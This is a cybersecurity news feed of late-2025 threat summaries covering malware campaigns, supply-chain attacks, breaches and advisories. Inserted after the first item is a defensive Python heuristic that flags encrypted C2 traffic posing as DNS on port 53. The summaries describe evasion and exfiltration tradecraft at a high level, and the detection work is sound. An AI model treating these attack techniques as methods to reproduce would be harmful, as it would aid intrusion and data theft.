Researchers at Trend Micro have discovered "GhostPenguin," a sophisticated, multi-threaded Linux backdoor written in C++. The malware remained completely undetected on VirusTotal for over four months after its initial submission. It was ultimately found using an AI-driven automated threat hunting pipeline designed to analyze zero-detection samples. GhostPenguin provides attackers with full remote shell access and file system control over an RC5-encrypted UDP channel, using port 53 to masquerade as DNS traffic, highlighting the growing need for AI in detecting emerging, stealthy threats.

Dec 9, 2025 · 5 min read
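GhostPenguin, in the entry above, talks RC5-encrypted UDP on port 53 so that it looks like DNS to anyone filtering by port. Encrypted payloads do not parse as DNS, though, which gives a cheap network-side check: validate the 12-byte header and walk the question section of every UDP/53 datagram, and send anything that fails for inspection. The heuristic below does that with the standard library only. It is an added example, not Trend Micro's pipeline or any real GhostPenguin traffic; the "resolver query" is built in the block and the "opaque blob" is a fixed constructed byte string standing in for an encrypted packet.

```python
import struct
from typing import Dict, Optional

VALID_OPCODES = {0, 1, 2, 4, 5}          # QUERY, IQUERY, STATUS, NOTIFY, UPDATE
VALID_QCLASSES = {1, 3, 4, 254, 255}     # IN, CH, HS, NONE, ANY


def _skip_name(payload: bytes, off: int) -> Optional[int]:
    """Return the offset just past a DNS name, or None if the labels are malformed."""
    while True:
        if off >= len(payload):
            return None
        length = payload[off]
        if length == 0:
            return off + 1
        if (length & 0xC0) == 0xC0:                  # compression pointer terminates the name
            return off + 2 if off + 2 <= len(payload) else None
        if length > 63:                               # 0x40/0x80 prefixes are reserved
            return None
        off += 1 + length
        if off > len(payload):
            return None


def looks_like_dns(payload: bytes) -> bool:
    """Structural check: plausible header plus a parseable question section."""
    if len(payload) < 12 or len(payload) > 4096:
        return False
    _txid, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
    if ((flags >> 11) & 0xF) not in VALID_OPCODES:
        return False
    if (flags >> 6) & 1:                              # Z bit must be zero
        return False
    if not 1 <= qd <= 4 or max(an, ns, ar) > 64:
        return False
    off = 12
    for _ in range(qd):
        off = _skip_name(payload, off)
        if off is None or off + 4 > len(payload):
            return False
        qtype, qclass = struct.unpack("!HH", payload[off:off + 4])
        if qtype == 0 or qclass not in VALID_QCLASSES:
            return False
        off += 4
    return True


def build_query(qname: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Constructed standard query (RD set) for one name, class IN."""
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.rstrip(".").split("."))
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + labels + b"\x00" + struct.pack("!HH", qtype, 1)


# Constructed UDP/53 payloads: a real-shaped query and an opaque blob standing in for ciphertext.
SAMPLE_UDP53: Dict[str, bytes] = {
    "resolver query": build_query("example.com"),
    "opaque blob": bytes.fromhex("9f3cd281ff170a4bc2e8d5719ab0044f6e21c35d8a77f2901b64e3ac07d9fb528c41a6e0"),
}


def classify(samples: Dict[str, bytes]) -> Dict[str, str]:
    return {label: ("dns" if looks_like_dns(p) else "NOT DNS: inspect") for label, p in samples.items()}


if __name__ == "__main__":
    for label, verdict in classify(SAMPLE_UDP53).items():
        print(f"{label}: {verdict}")
```

The check is deliberately permissive: anything a resolver would accept passes, so it does not catch DNS tunnelling that uses well-formed queries, only traffic that merely borrows the port, which is the GhostPenguin case. The positive form of the same control is to allow UDP/53 from servers only to the organisation's resolvers.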

Vishing Attackers Impersonate IT on Teams, Trick Users into Running Fileless Malware

A sophisticated vishing (voice phishing) campaign is abusing trusted enterprise tools to deploy stealthy malware. Attackers impersonate IT support staff on Microsoft Teams, convincing users to initiate a Windows Quick Assist session. Once they have remote access, the attackers direct the user to a malicious site to download a loader. This loader then fetches an encrypted payload and executes it directly in memory using .NET reflection, a fileless technique designed to evade traditional antivirus and endpoint detection solutions. The campaign highlights the increasing trend of blending social engineering with the abuse of legitimate software.

Dec 9, 2025 · 5 min read

IBM Rolls Out Critical Patches for AIX, Cloud Pak, and Other Enterprise Software

IBM has released a wave of security updates addressing vulnerabilities in numerous enterprise products, prompting an advisory from the Canadian Centre for Cyber Security. The bulletins, published between December 1 and December 7, 2025, include critical patches for IBM AIX, VIOS, Aspera Shares, Business Automation Workflow, and Cloud Pak System, among others. Administrators are strongly urged to review the advisories and apply the necessary updates promptly to protect their infrastructure from potential exploitation.

Dec 9, 2025 · 4 min read

Race for Secure Digital Identity Heats Up with New Platforms from IBM and Turing Space

The digital identity space is seeing rapid innovation as IBM launches "Verify Digital Credentials," a new platform for issuing and authenticating secure digital documents like licenses and academic records. Built on open standards, it aims to reduce breach risk by decentralizing data storage. Concurrently, decentralized identity provider Turing Space is partnering with the IOTA blockchain to enhance its own verification offering, aiming to lower costs for enterprise-scale deployment. These moves highlight an industry-wide push towards verifiable credentials as a foundational defense against the growing threat of AI-powered deepfakes and identity fraud.

Dec 9, 2025 · 4 min read

Supply Chain Attack: Marquis Software Breach Hits 74 Banks, Akira Ransomware Suspected

Marquis Software Solutions, a U.S.-based financial software provider, has suffered a major data breach, compromising the sensitive information of over 400,000 customers across 74 client banks and credit unions. This significant supply chain attack is suspected to be the work of the Akira ransomware gang. According to investigators, the threat actors likely gained initial access by exploiting vulnerabilities in SonicWall firewall devices on Marquis's network. This incident highlights the cascading risk in the financial sector, where a compromise at a single software vendor can have widespread consequences for numerous downstream institutions and their customers.

Dec 8, 2025 · 5 min read

White House Sets 2025 Deadline for Post-Quantum Crypto Readiness

The White House has issued a new Executive Order to accelerate the U.S. federal government's transition to post-quantum cryptography (PQC). The order sets a critical deadline of December 1, 2025, for several key initiatives. It directs CISA and the NSA to create and maintain a list of commercially available products that support PQC standards, guiding federal procurement. It also mandates the development of new requirements for federal agencies to support TLS 1.3, a necessary precursor for PQC integration. Additionally, NIST is tasked with updating its Secure Software Development Framework (SSDF) to include practices for developing quantum-resistant software.

Dec 8, 2025 · 5 min read

WhatsApp Worm Spreads Astaroth Banking Trojan in New Brazilian Campaign

A new malware campaign, tracked as STAC3150, is targeting banking users in Brazil by using WhatsApp Web as a distribution vector for the Astaroth banking trojan. The attack begins with a social engineering lure sent via WhatsApp, which persuades the victim to download a malicious ZIP archive. The archive contains a VBS or HTA file that, when executed, initiates a multi-stage infection process to deploy the Astaroth trojan. Astaroth is a well-known information stealer designed to capture banking credentials and other sensitive data. This campaign highlights the increasing use of popular messaging platforms for malware delivery.

Dec 8, 2025 · 4 min read

SharePoint Flaw Chain Exploited to Deploy Warlock Ransomware

A new attack campaign attributed to the threat actor Storm-2603 is exploiting a chain of Microsoft SharePoint vulnerabilities (CVE-2025-49706, CVE-2025-49704) for initial access. Post-exploitation, the attackers deploy Velociraptor, a legitimate digital forensics and incident response (DFIR) tool, for reconnaissance and persistence. By abusing a trusted tool, the attackers blend in with normal administrative activity, evading detection. In several confirmed incidents, this attack chain culminates in the deployment of the Warlock ransomware. This 'living-off-the-land' technique highlights a sophisticated approach to facilitating ransomware attacks.

Dec 8, 2025 · 5 min read

Supply Chain Breach at Vendor Marquis Exposes Data From Dozens of US Banks

A ransomware attack on Marquis Software Solutions, a marketing and data analytics vendor for the financial industry, has resulted in a significant supply chain data breach affecting dozens of U.S. banks and credit unions. Marquis began notifying its clients on November 26, 2025, about the incident, which was first detected in August. The breach exposed highly sensitive customer information, including names, Social Security numbers, taxpayer IDs, and financial account details, that the financial institutions had entrusted to the vendor. While the banks' internal systems were not compromised, the incident highlights the profound risks associated with third-party vendors. At least 42,000 individuals in Maine alone have been affected, and Marquis is offering credit monitoring services to impacted customers.

Dec 8, 2025 · 6 min read

Malicious Go Packages Impersonating Google UUID Library Steal Data

A sophisticated and long-running supply chain attack targeting Go developers has been discovered, active since at least May 2021. The attack involves two malicious packages, `github.com/bpoorman/uuid` and `github.com/bpoorman/uid`, which impersonate a popular Google UUID library using a typosquatting technique. The counterfeit packages are fully functional to avoid suspicion but contain a hidden backdoor. A specific function, `Valid`, is weaponized to secretly encrypt and exfiltrate any data passed to it, such as user IDs or session tokens, to an external paste site. This stealthy method allows the attacker, 'bpoorman', to siphon sensitive information from compromised applications.

Dec 7, 2025 · 4 min read

Mexico's Maguen Group Launches Global Cybersecurity Brand 'Fortem'

Maguen Group, a leading private security firm based in Mexico, has officially launched Fortem Cybersecurity, its new global cybersecurity brand, on December 7, 2025. The new entity is an evolution of the company's existing cybersecurity arm, MT Cyber, which it acquired in 2019. With Fortem, Maguen Group aims to 'democratize cybersecurity' by offering enterprise-level protection to companies of all sizes. The launch marks a strategic push for global expansion, leveraging its existing presence in Mexico, Ecuador, and Germany, with the United States targeted as the next major market.

Dec 7, 2025 · 2 min read

Malicious Rust Package 'evm-units' Targets Web3 Developers

A malicious software package named 'evm-units' has been discovered and removed from Rust's official crates.io registry. The package, downloaded over 7,200 times, targeted Web3 developers by impersonating a legitimate utility for the Ethereum Virtual Machine (EVM). While appearing functional, the crate contained a stealthy, multi-stage loader designed to download and execute operating system-specific malware. The malware included code to specifically evade 360 Total Security, a popular antivirus in China, suggesting the threat actor's focus was on stealing cryptocurrency from developers, likely in the Asian market. A second package, 'uniswap-utils', was also removed for depending on the malicious crate.

Dec 7, 2025 · 4 min read

Wireshark Vulnerabilities Create Denial-of-Service Risk for Security Teams

France's national cybersecurity agency, CERT-FR, has issued a security advisory for two critical vulnerabilities in Wireshark, the world's most popular network protocol analyzer. The flaws, identified as CVE-2025-13945 and CVE-2025-13946, can be exploited by a remote attacker to cause a denial-of-service (DoS) condition. This poses a significant risk to security operations, as an attacker could crash the tool during a live incident investigation, effectively blinding security analysts. Users are urged to update to the patched versions (4.4.12 and 4.6.2) to mitigate the risk.

Dec 7, 2025 · 3 min read

Washington Post Breached by Clop Ransomware via Oracle Flaws

The Washington Post has officially confirmed it was a victim of a large-scale cyberattack orchestrated by the Clop ransomware group. The threat actors exploited vulnerabilities in Oracle's E-Business Suite, compromising over 100 organizations globally. The campaign involves data exfiltration followed by aggressive extortion tactics, with Clop publicly naming victims on its dark web leak site to pressure them into paying ransoms reportedly as high as $50 million. This incident underscores the significant risk posed by vulnerabilities in widely used enterprise software and the sophisticated, multi-faceted extortion methods employed by modern ransomware gangs.

Dec 7, 2025 · 6 min read

CISA: Commercial Spyware Hijacking Signal & WhatsApp via Zero-Clicks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical alert regarding active campaigns using commercial spyware to compromise the Signal and WhatsApp accounts of high-value targets. Attackers are employing sophisticated methods including social engineering, malicious QR codes for device linking, and zero-click exploits that require no user interaction. The campaigns are reportedly targeting current and former government officials, military personnel, and civil society organizations across the U.S., Europe, and the Middle East. CISA warns that initial access to messaging apps is often used as a beachhead to deploy further malware and achieve full device compromise.

Dec 7, 2025 · 5 min read

Global Coalition Targets 'Bulletproof' Hosting Services Fueling Cybercrime

An international coalition of cybersecurity agencies, including the NSA, CISA, and the FBI, has launched a coordinated effort to combat 'bulletproof' hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for activities like ransomware and phishing. A new joint advisory urges Internet Service Providers (ISPs) and network defenders to adopt strategies to identify, block, and report these malicious hosts. The guidance focuses on a nuanced approach, including creating high-confidence blocklists and improving 'know your customer' processes, to disrupt the foundational infrastructure of cybercrime.

Dec 6, 2025 · 4 min read

Cloudflare Outage Hits 28% of Global Traffic After Faulty React2Shell Patch

Cloudflare, a leading internet infrastructure provider, experienced a 25-minute global outage on December 5, 2025, that impacted approximately 28% of its HTTP traffic and made numerous popular websites inaccessible. The company quickly confirmed the disruption was not a cyberattack but was self-inflicted, caused by a faulty emergency change to its Web Application Firewall (WAF). The problematic update was deployed to provide mitigation against the critical React2Shell (CVE-2025-55182) vulnerability. The incident highlights the inherent risks of rapid, large-scale deployments, even when intended to improve security, and raises questions about change management processes for critical infrastructure.

Dec 6, 2025 · 4 min read

AI Infrastructure at Risk: MCP Servers Emerge as New Supply Chain Threat

A new security advisory warns that Model Context Protocol (MCP) servers represent a significant and growing supply chain risk for organizations building AI-powered applications. These servers act as highly privileged automation engines, often possessing trusted access to sensitive enterprise resources like code repositories, email systems, and internal APIs. The warning follows the analysis of a critical vulnerability at hosting service Smithery.ai, where a single path traversal flaw could have allowed an attacker to gain administrative control over 3,000 hosted MCP servers. This and other incidents demonstrate that MCP servers are high-value targets that can be exploited to compromise entire AI software supply chains.

Dec 6, 2025 · 5 min read

Iran Bans Officials From Using All Internet-Connected Devices Over Espionage Fears

In a drastic measure to combat espionage, Iran's Cybersecurity Command has banned all government officials and their security staff from using any device connected to public communication networks. The directive, reported on December 5, 2025, includes smartphones, laptops, and smartwatches. The move is a direct response to fears of hacking and mobile tracking being used for targeted assassinations, referencing past attacks on nuclear scientists and recent pager and walkie-talkie attacks against Hezbollah. The policy highlights a security philosophy of complete network isolation for key personnel over reliance on defensive technology.

Dec 6, 2025 · 4 min read

Massive Supply Chain Attack Hits 200+ Companies via Salesforce App; Hacker Group Claims Breach

A hacking collective known as Scattered Lapsus$ Hunters has claimed responsibility for a large-scale supply chain attack that compromised the Salesforce data of over 200 organizations. The attack did not exploit a vulnerability in Salesforce itself, but rather abused OAuth tokens from the Gainsight customer-success application. The attackers gained unauthorized access to customer data, prompting Salesforce to revoke all tokens for the app. The group has named high-profile victims like Atlassian, Docusign, and Verizon, highlighting the significant risks of SaaS-to-SaaS integrations.

Dec 5, 2025 · 6 min read

New "Benzona" Ransomware Strain Discovered in the Wild

Security researchers at CYFIRMA have discovered a new ransomware strain named "Benzona." The malware encrypts files on Windows, macOS, and Linux systems, appending a ".benzona" extension and dropping a ransom note titled "RECOVERY_INFO.txt". Victims are instructed to use the TOR browser to access a chat portal for recovery negotiations. The threat actors behind Benzona are believed to use a variety of initial access vectors, including social engineering, botnets, and exploitation of software vulnerabilities.

Dec 5, 2025 · 4 min read

Critical 7-Zip RCE Vulnerability Now Under Active Exploitation

A critical remote code execution (RCE) vulnerability in the popular 7-Zip file archiver, tracked as CVE-2025-11001, is now being actively exploited in the wild. The path traversal flaw, which affects versions prior to 25.0.0, can be triggered when a user extracts a specially crafted malicious archive. This allows an attacker to write files to arbitrary locations and execute code. NHS England has issued an advisory confirming active exploitation, urging all organizations to update their installations immediately.

Dec 5, 2025 · 4 min read

CISA Exposes 'BRICKSTORM' Backdoor Used by Chinese State Actors to Infiltrate US Government

The US Cybersecurity and Infrastructure Security Agency (CISA), NSA, and Canadian Centre for Cyber Security have jointly exposed a sophisticated backdoor named 'BRICKSTORM'. According to the December 4, 2025 advisory, People's Republic of China (PRC) state-sponsored actors are using this malware to target government and IT sector organizations. BRICKSTORM is designed for stealth and long-term persistence in both VMware vSphere and Windows environments. It employs multi-layered encrypted communications, including DNS-over-HTTPS (DoH), to hide its C2 traffic. The advisory details an attack chain where actors used a web shell for initial access, moved laterally via RDP, and ultimately deployed BRICKSTORM on a VMware vCenter server to compromise domain controllers. Agencies are urged to hunt for this threat immediately.

Dec 4, 2025 · 6 min read

Android Zero-Days Under Active Attack, CISA Adds to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two high-severity Android zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The vulnerabilities, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), affect the core Android Framework on versions 13, 14, 15, and 16. Google's December 2025 security bulletin confirmed the flaws may be subject to 'limited, targeted exploitation,' a pattern often associated with sophisticated spyware campaigns. Federal agencies are now mandated to patch these vulnerabilities, and all Android users are urged to apply the latest security updates as soon as possible to protect against potential device compromise.

Dec 4, 2025 · 4 min read

Ransomware Payments Exceed $2.1 Billion Since 2022, FinCEN Reports

A new Financial Trend Analysis from the U.S. Treasury's Financial Crimes Enforcement Network (FinCEN), released December 4, 2025, reveals that financial institutions reported over $2.1 billion in ransomware-related payments between January 2022 and December 2024. The data, derived from Bank Secrecy Act (BSA) filings, shows a peak in 2023 with $1.1 billion in payments. The report identifies ALPHV/BlackCat, LockBit, and Akira as some of the most prevalent variants, with the manufacturing and financial services sectors being the most frequent victims. The analysis underscores the critical role of BSA reporting in tracking cybercrime trends and informing law enforcement actions.

Dec 4, 2025 · 4 min read

Freedom Mobile Data Breach Exposes Customer PII via Compromised Subcontractor

Canadian telecommunications provider Freedom Mobile announced on December 3, 2025, that it suffered a data breach after an unauthorized party gained access to its systems on October 23, 2025. The attacker leveraged the compromised account of a third-party subcontractor to access a customer account management platform. Exposed data includes customer names, addresses, birth dates, phone numbers, and account numbers. Freedom Mobile stated that more sensitive data like payment card information and passwords were not affected. The company is notifying a 'limited number' of affected individuals and advising them to be vigilant against phishing attacks.

Dec 4, 2025 · 4 min read

CISA KEV Alert: Actively Exploited ScadaBR Flaw Puts Industrial Control Systems at Risk

CISA has added CVE-2021-26828, a high-severity vulnerability in the OpenPLC ScadaBR industrial control system (ICS) software, to its Known Exploited Vulnerabilities (KEV) catalog as of December 3, 2025. The flaw, with a CVSS score of 8.7, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE) by uploading a malicious JSP file. This poses a significant risk to operational technology (OT) environments where this open-source SCADA solution is deployed. Federal agencies are mandated to patch by December 24, 2025, and CISA urges all organizations in critical infrastructure sectors to prioritize remediation.

Dec 4, 2025 · 5 min read

Under Armour Sued Over Data Breach Attributed to 'Everest' Cybercrime Group

Athletic apparel giant Under Armour is the target of a new class action lawsuit following a November 2025 data breach. The suit, reported on December 4, 2025, claims the company was negligent in protecting the personal information of consumers and employees. The breach was allegedly carried out by the 'Everest' cybercriminal group, which claims to have stolen and leaked hundreds of gigabytes of data. The lawsuit asserts that Under Armour failed to implement basic cybersecurity measures like encryption and did not provide timely notification to victims, who now face a heightened risk of identity theft and fraud.

Dec 4, 2025 · 4 min read

Critical Zero-Days in PyTorch Scanner 'PickleScan' Create AI Supply Chain Risk

Security firm JFrog has disclosed three critical zero-day vulnerabilities in PickleScan, a popular open-source tool used to scan Python pickle files for malware, particularly within the PyTorch AI framework. The flaws, collectively rated with a CVSS score of 9.3, allow an attacker to craft a malicious AI model that bypasses PickleScan's security checks. When this seemingly safe model is loaded by a user, it can lead to arbitrary code execution. This discovery, announced on December 3, 2025, highlights a significant software supply chain risk for the AI/ML community, as attackers could distribute weaponized models that evade standard security scanning.

Dec 4, 2025 · 5 min read

AWS Boosts Cloud Defense with New AI-Powered Security Tools at re:Invent 2025

At its re:Invent 2025 conference, Amazon Web Services (AWS) unveiled several major additions to its security portfolio, heavily infused with artificial intelligence. Key announcements on December 3, 2025, included the preview of AWS Security Agent, a context-aware tool for proactive application security testing throughout the development lifecycle. AWS also announced the general availability of its revamped AWS Security Hub for centralized cloud security posture management (CSPM) and new attack sequence findings in Amazon GuardDuty for better threat detection in EC2 and ECS environments. These updates aim to automate and enhance security operations for organizations in the cloud.

Dec 4, 2025 · 4 min read

React2Shell: Critical 10.0 CVSS RCE Hits React & Next.js, Actively Exploited!

A critical unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' and tracked as CVE-2025-55182, has been disclosed in React Server Components. With a maximum CVSS score of 10.0, the flaw affects popular frameworks like Next.js and allows attackers to take complete control of vulnerable servers. Security researchers have already observed active exploitation in the wild, with attackers attempting to harvest cloud credentials and deploy cryptocurrency miners. Major cloud providers have issued WAF rules as a temporary mitigation, but immediate patching is essential.

Dec 3, 2025 · 6 min read

ValleyRAT Malware Targets Job Seekers Using Foxit PDF Reader Disguise

A new malware campaign is distributing the ValleyRAT remote access trojan by preying on job seekers. Attackers send emails with weaponized executables disguised as HR documents, using the Foxit PDF Reader icon as a lure. The attack leverages a legitimate, renamed Foxit executable to perform a DLL side-loading attack, which silently loads the malware while displaying a decoy document to the victim. Once active, ValleyRAT provides attackers with full control over the compromised system, enabling data theft and surveillance.

Dec 3, 2025 · 5 min read

G7 Unveils New Framework for Coordinated Cyber Response in Financial Sector

The G7 Cyber Expert Group has published a new policy paper outlining non-binding principles for Collective Cyber Incident Response and Recovery (CCIRR) within the global financial sector. The framework, developed to foster greater cross-border cooperation, aims to improve information sharing, streamline crisis communication, and bolster the resilience of the international financial system against major cyber incidents. The principles are intended as a high-level guide rather than a set of regulatory requirements.

Dec 3, 2025 · 4 min read

EU Cyber Resilience Act Deadlines Loom: Vulnerability Reporting Starts 2026

The European Union is advancing the implementation of its landmark Cyber Resilience Act (CRA), which establishes mandatory cybersecurity requirements for all hardware and software products sold in the EU. With the regulation now in force, key deadlines are approaching. Manufacturers must prepare for a critical milestone in September 2026, when obligations to report actively exploited vulnerabilities to authorities within 24 hours will begin. The act aims to enforce security-by-design and ensure products remain secure throughout their lifecycle.

Dec 3, 2025 · 5 min read

Qilin Ransomware Gang Claims 7 of 11 New Victims in 24 Hours

The daily ransomware report for November 8, 2025, highlights a significant burst of activity from the Qilin ransomware group, which claimed responsibility for 7 of the 11 new victims announced in the past 24 hours. The DragonForce group was the second most active with three victims. The attacks primarily targeted the professional services and manufacturing sectors, with victims located in the United States, Canada, and the United Kingdom. This latest surge brings the total number of publicly claimed ransomware victims in 2025 to 6,364, underscoring the relentless and persistent threat that ransomware-as-a-service (RaaS) operations pose to organizations globally.

Dec 2, 2025 · 5 min read

SmartTube App Compromised: Malicious Update Pushed via Stolen Keys

A significant supply chain attack has compromised the popular ad-free YouTube client for Android TV, SmartTube. An attacker stole the developer's signing keys and distributed a malicious update containing surveillance-style malware through official channels. The malware, hidden in versions 30.43 through 30.55, collected device information and sent it to a command-and-control server. In response, Google Play Protect began automatically disabling the app on user devices. The developer has since revoked the compromised keys and released a new, clean version, which requires all users to perform a manual reinstallation to ensure their security.

Dec 2, 2025 · 5 min read

'Cryptomixer' Shut Down: Authorities Seize €25M in Bitcoin from Laundering Service

A coordinated international law enforcement action, codenamed "Operation Olympia," has successfully dismantled Cryptomixer.io, a major cryptocurrency mixing service. Led by Swiss and German authorities with significant support from Europol and Eurojust, the takedown resulted in the seizure of servers, 12 terabytes of data, and over €25 million in Bitcoin. The service, active since 2016, is believed to have laundered over €1.3 billion for a wide range of criminal groups, including ransomware gangs and the North Korean Lazarus Group, by obfuscating the trail of illicit funds.

Dec 2, 2025 · 4 min read

Iran-Linked MuddyWater APT Targets Israel with New 'MuddyViper' Backdoor

The Iranian-affiliated APT group MuddyWater has been observed in a new cyberespionage campaign targeting critical infrastructure and other key sectors in Israel and Egypt. Active from late 2024 to early 2025, the campaign leverages a previously undocumented custom C/C++ backdoor named MuddyViper. The malware is delivered via a loader called Fooder, which in some cases was disguised as the classic Snake game to deceive victims. The group, also known as Mango Sandstorm, used the backdoor for espionage, credential theft, and remote command execution, and showed operational overlap with another Iranian group, Lyceum.

Dec 2, 2025 · 6 min read

Lazarus APT's Remote IT Worker Infiltration Scheme Exposed in Real-Time

A joint investigation by security researchers has exposed the inner workings of a North Korean Lazarus Group scheme where operatives commit identity fraud to get hired as remote IT workers at Western firms. By luring the threat actors into a sophisticated honeypot environment, researchers from BCA LTD, NorthScan, and ANY.RUN were able to capture their tactics, techniques, and procedures (TTPs) in real-time. The scheme's goals are twofold: to gain persistent network access for espionage and to funnel salaries back to the Democratic People's Republic of Korea (DPRK) in violation of international sanctions.

Dec 2, 2025 · 6 min read

India Backs Down on Mandatory Pre-Installed Government "Snooping App"

Following widespread criticism from privacy advocates and significant resistance from major tech companies, the Indian government has withdrawn a controversial directive that would have required smartphone makers like Apple and Samsung to pre-install a non-deletable, state-owned security app. The app, named "Sanchar Saathi," was labeled a potential "snooping app" by critics, who raised concerns that it could be used as a tool for mass surveillance, violating citizens' right to privacy. The swift reversal marks a notable event in the ongoing global debate over digital privacy and government authority.

Dec 2, 2025 · 4 min read

AI Cybersecurity Firm Tenex Expands to EMEA with New Funding

AI-native cybersecurity firm Tenex announced its expansion into the Europe, Middle East, and Africa (EMEA) region on December 2, 2025. The strategic move is supported by a new Series A investment from the global investment firm DTCP. Tenex, which offers an AI-driven managed detection and response (MDR) service, has seen rapid growth since its founding in January 2025 and plans to establish an international headquarters in Europe in 2026 to capitalize on the region's demand and talent pool.

Dec 2, 2025 · 2 min read

CrowdStrike Named AWS Global Security and Marketplace Partner of the Year

At the AWS re:Invent 2025 conference, cybersecurity leader CrowdStrike was named both the Amazon Web Services (AWS) 2025 Global Security Partner of the Year and the Global Marketplace Partner of the Year. This dual recognition follows a landmark achievement for CrowdStrike, which became the first cloud-native independent software vendor (ISV) to surpass $1 billion in sales through the AWS Marketplace within a single calendar year, underscoring the strength of its cloud security offerings and its partnership with AWS.

Dec 2, 2025 · 3 min read

Coupang Breach Exposes 33.7 Million Users in South Korea

South Korean e-commerce leader Coupang has admitted to a significant data breach exposing the personal information of 33.7 million customers, impacting over half of South Korea's population. The breach, which began in June 2025 and was detected in mid-November, stemmed from authentication vulnerabilities and the potential misuse of an ex-employee's still-active authentication key. Exposed data includes names, emails, phone numbers, and addresses. Coupang has reset user passwords and is working with authorities, including the Korea Internet & Security Agency (KISA), on the investigation.

Dec 1, 2025 · 6 min read

Urgent Android Update: Google Patches 107 Flaws, Two Zero-Days Under Active Attack

Google has issued its December 2025 Android security bulletin, patching a total of 107 vulnerabilities. The update is critical, as it addresses two high-severity zero-days, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), which are under limited, targeted exploitation in the wild. The patch also fixes a critical remote denial-of-service (DoS) flaw, CVE-2025-48631, in the Android Framework. The update covers vulnerabilities in components from Qualcomm, Arm, MediaTek, and others, affecting Android versions 13 through 16. Users are urged to install the update as soon as it becomes available for their devices.

Dec 1, 2025 · 5 min read

APTs Exploit WinRAR Zero-Day to Target Industrial Sector in Q3 2025

Kaspersky's Q3 2025 threat report for industrial organizations highlights extensive exploitation of a WinRAR zero-day vulnerability, CVE-2025-8088. The flaw was used by multiple threat actors, including the RomCom cybercrime group and the Paper Werewolf (GOFFEE) APT, to deploy backdoors like SnipBot and the Mythic agent against industrial targets. The report also details other significant cyber-espionage campaigns, such as PhantomCore's attacks on Russian critical infrastructure and Cavalry Werewolf's phishing operations against energy and manufacturing sectors, underscoring the persistent threat to industrial control systems (ICS).

Dec 1, 2025 · 6 min read

FTC Slams EdTech Firm Illuminate Education Over Breach of 10M Students' Data

The U.S. Federal Trade Commission (FTC) has taken enforcement action against education technology provider Illuminate Education for a 2021 data breach that exposed the personal and health information of 10.1 million students. The FTC alleged the company failed to implement reasonable security measures, citing the attacker's use of credentials from an employee who had left 3.5 years prior. Under the settlement, Illuminate must implement a comprehensive security program, delete non-essential student data, and undergo third-party assessments, highlighting severe consequences for failing to protect children's data.

Dec 1, 2025 · 5 min read

Warning: Public PoC Exploit Released for Critical Zero-Click Outlook RCE Flaw

A proof-of-concept (PoC) exploit has been publicly released for CVE-2024-21413, a critical zero-click remote code execution (RCE) vulnerability in Microsoft Outlook nicknamed 'MonikerLink'. The flaw allows an attacker to execute arbitrary code on a victim's machine simply by sending a malicious email, with no user interaction required. The release of the PoC dramatically increases the risk of widespread exploitation. All organizations using affected versions of Outlook are urged to apply the security patches released by Microsoft immediately to prevent compromise.

Dec 1, 2025 · 5 min read

Mystery Breach: Major Tech Firm Exposes Millions of Users' Data

A major, but currently unnamed, technology company has reportedly suffered a massive data breach, exposing the personal data of millions of users worldwide. The breach was detected on November 24, 2025, after unusual activity was observed on the company's servers, stemming from an unspecified vulnerability. The company has reportedly shut down the compromised servers, notified authorities, and begun alerting users. This incident is being described as one of the largest in recent years, placing millions at risk of identity theft and phishing attacks.

Dec 1, 2025 · 5 min read

US Probes Bitcoin Mining Giant Bitmain for National Security Threats

The U.S. Department of Homeland Security is reportedly conducting a probe, codenamed 'Operation Red Sunset,' into Chinese bitcoin mining hardware manufacturer Bitmain. According to reports from November 29, 2025, the investigation centers on fears that Bitmain's mining devices could contain hidden backdoors for espionage or capabilities to sabotage the U.S. electrical grid. The probe allegedly involves physically inspecting imported hardware at U.S. ports for kill switches or remote access features. Bitmain has denied the allegations, but the investigation highlights growing national security concerns surrounding foreign-made hardware in critical infrastructure sectors.

Nov 30, 2025 · 5 min read

Yearn Finance Hit by $9M 'Infinite Mint' Exploit

On November 30, 2025, the DeFi protocol Yearn Finance was exploited for approximately $9 million. The attacker leveraged a flaw in a legacy yETH stableswap smart contract, using a deposit of just 16 wei (a fraction of a cent) to mint a massive 235 septillion yETH tokens. The vulnerability stemmed from the contract's failure to clear cached storage variables after liquidity was fully drained. By manipulating these phantom balances, the attacker triggered an 'infinite mint' condition, subsequently draining the pool's assets into a Balancer pool. Around $3 million was quickly laundered through the Tornado Cash mixer.

Nov 30, 2025 · 5 min read

Amazon Data Center Blueprints Leaked in Breach of Steel Contractor

A significant data breach at Cooper Steel Fabricators, a major U.S. structural steel contractor, was reported on November 30, 2025. A threat actor is selling a 330 GB database, claiming it is a 'complete mirror' of the company's FTP server. The asking price is $28,500. The leaked data allegedly contains highly sensitive intellectual property, including detailed blueprints and structural models for an Amazon data center in Ohio and a sorting facility in Massachusetts. Blueprints for Walmart distribution centers are also included, highlighting the severe supply chain risks that can expose the critical infrastructure plans of major corporations.

Nov 30, 2025 · 5 min read

Gaming Giant Netmarble Breached, 6.1 Million Users' Data Exposed

South Korean gaming company Netmarble confirmed on November 30, 2025, that it suffered a data breach on November 22, exposing the personal information of 6.11 million members of its PC game portal. The compromised data includes names, birthdates, and encrypted passwords. The leak also affected 66,000 PC cafe owners and 17,000 current and former employees. Netmarble came under fire for waiting nearly 72 hours to report the incident to the Korea Internet & Security Agency (KISA), raising concerns about its incident response transparency.

Nov 30, 2025 · 5 min read

CodeRED Alert System Hit by Ransomware, Wall Street Scrambles After Vendor Hack

